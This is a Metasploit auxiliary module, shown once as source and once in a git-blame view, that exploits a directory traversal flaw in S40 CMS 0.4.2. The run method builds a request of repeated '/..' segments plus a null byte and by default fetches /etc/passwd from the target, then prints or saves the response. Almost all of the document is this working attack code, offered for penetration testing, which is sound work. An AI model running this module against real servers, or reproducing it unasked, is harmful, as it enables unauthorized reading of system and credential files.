metasploit-framework/modules/auxiliary/scanner/http/s40_traversal.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'S40 0.4.2 CMS Directory Traversal Vulnerability',
      'Description'    => %q{
          This module exploits a directory traversal vulnerability found in S40 CMS.
        The flaw is due to the 'page' function not properly handling the $pid parameter,
        which allows a malicious user to load an arbitrary file path.
      },
      'References'     =>
        [
          [ 'OSVDB', '82469'],
          [ 'EDB', '17129' ]
        ],
      'Author'         =>
        [
          'Osirys <osirys[at]autistici.org>',  #Discovery, PoC
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Apr 7 2011"
    ))

    register_options(
      [
        Opt::RPORT(80),
        OptString.new("TARGETURI", [true, 'The base path to S40', '/s40/']),
        OptString.new("FILE", [true, 'The file to retrieve', '/etc/passwd']),
        OptBool.new('SAVE', [false, 'Save the HTTP body', false]),
        OptInt.new("DEPTH", [true, 'Traversal depth', 10])
      ], self.class)
  end

  def run
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'

    t = "/.." * datastore['DEPTH']

    print_status("Retrieving #{datastore['FILE']}")

    # No permission to access.log or proc/self/environ, so this is all we do :-/
    uri = normalize_uri(uri, 'index.php')
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "#{uri}/?p=#{t}#{datastore['FILE']}%00"
    })

    if not res
      print_error("Server timed out")
    elsif res and res.body =~ /Error 404 requested page cannot be found/
      print_error("Either the file doesn't exist, or you don't have the permission to get it")
    else
      # We don't save the body by default, because there's also other junk in it.
      # But we still have a SAVE option just in case
      print_line(res.body)

      if datastore['SAVE']
        p = store_loot(
          's40.file',
          'application/octet-stream',
          rhost,
          res.body,
          ::File.basename(datastore['FILE'])
        )
        print_status("File saved as: #{p}")
      end
    end
  end
end
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00			`##`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'S40 0.4.2 CMS Directory Traversal Vulnerability',`
			`'Description' => %q{`
			`This module exploits a directory traversal vulnerability found in S40 CMS.`
			`The flaw is due to the 'page' function not properly handling the $pid parameter,`
			`which allows a malicious user to load an arbitrary file path.`
			`},`
			`'References' =>`
			`[`
			`[ 'OSVDB', '82469'],`
			`[ 'EDB', '17129' ]`
			`],`
			`'Author' =>`
			`[`
			`'Osirys <osirys[at]autistici.org>', #Discovery, PoC`
			`'sinn3r'`
			`],`
			`'License' => MSF_LICENSE,`
			`'DisclosureDate' => "Apr 7 2011"`
			`))`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(80),`
			`OptString.new("TARGETURI", [true, 'The base path to S40', '/s40/']),`
			`OptString.new("FILE", [true, 'The file to retrieve', '/etc/passwd']),`
			`OptBool.new('SAVE', [false, 'Save the HTTP body', false]),`
			`OptInt.new("DEPTH", [true, 'Traversal depth', 10])`
			`], self.class)`
			`end`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run`
			`uri = target_uri.path`
			`uri << '/' if uri[-1, 1] != '/'`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`t = "/.." * datastore['DEPTH']`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Retrieving #{datastore['FILE']}")`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# No permission to access.log or proc/self/environ, so this is all we do :-/`
			`uri = normalize_uri(uri, 'index.php')`
			`res = send_request_raw({`
			`'method' => 'GET',`
			`'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00"`
			`})`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if not res`
			`print_error("Server timed out")`
			`elsif res and res.body =~ /Error 404 requested page cannot be found/`
			`print_error("Either the file doesn't exist, or you don't have the permission to get it")`
			`else`
			`# We don't save the body by default, because there's also other junk in it.`
			`# But we still have a SAVE option just in case`
			`print_line(res.body)`
Add s40 dir traversal vuln I can't believe I stayed up all night, and this is all I could find. 2012-05-31 09:43:57 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if datastore['SAVE']`
			`p = store_loot(`
			`'s40.file',`
			`'application/octet-stream',`
			`rhost,`
			`res.body,`
			`::File.basename(datastore['FILE'])`
			`)`
			`print_status("File saved as: #{p}")`
			`end`
			`end`
			`end`
Adding swtornio's OSVDB ref Watch the trailing commas, that wangs up Ruby 1.8.7 and prior. Squashed commit of the following: commit c00363993a726cd0c87fbaee769c44f680feff72 Author: Tod Beardsley <todb@metasploit.com> Date: Mon Jun 4 09:33:18 2012 -0500 Removing trailing comma commit 594cae0cab60ba0493a6c50a001cd6885f05522b Author: Steve Tornio <swtornio@gmail.com> Date: Mon Jun 4 09:10:36 2012 -0500 add osvdb ref 2012-06-04 14:34:28 +00:00			`end`